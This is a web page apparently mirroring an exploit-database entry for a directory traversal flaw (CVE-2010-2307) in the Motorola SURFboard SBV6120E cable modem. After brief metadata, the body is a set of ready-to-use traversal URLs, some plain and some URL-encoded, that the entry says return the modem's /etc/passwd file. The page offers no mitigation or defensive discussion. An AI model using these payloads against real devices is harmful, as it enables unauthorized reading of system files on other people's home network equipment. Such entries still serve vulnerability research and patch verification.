[] NeoSense
E X P L O I T S
title author type platform port cve id

Motorola Surfboard Cable Modem - Directory Traversal

Author: S2 Crew
type: remote
platform: hardware
port: 
date_added: 2010-06-02 
date_updated:  
verified: 0 
codes: CVE-2010-2307;OSVDB-65249 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: Motorola SURFBoard Cable Modem Directory Traversal
# Date: 2010.06.03
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: Model name: SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC
# Tested on: ^
# CVE: -
# Code :

The following urls get back the /etc/passwd file from the modem:

http://[IP]///etc/passwd <http://[ip]///etc/passwd>
http://[IP]/../../etc/passwd

http://[IP]/..%2f..%2fetc/passwd <http://[ip]/..%2f..%2fetc/passwd>
http://[IP]/%2e%2e/%2e%2e/etc/passwd
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.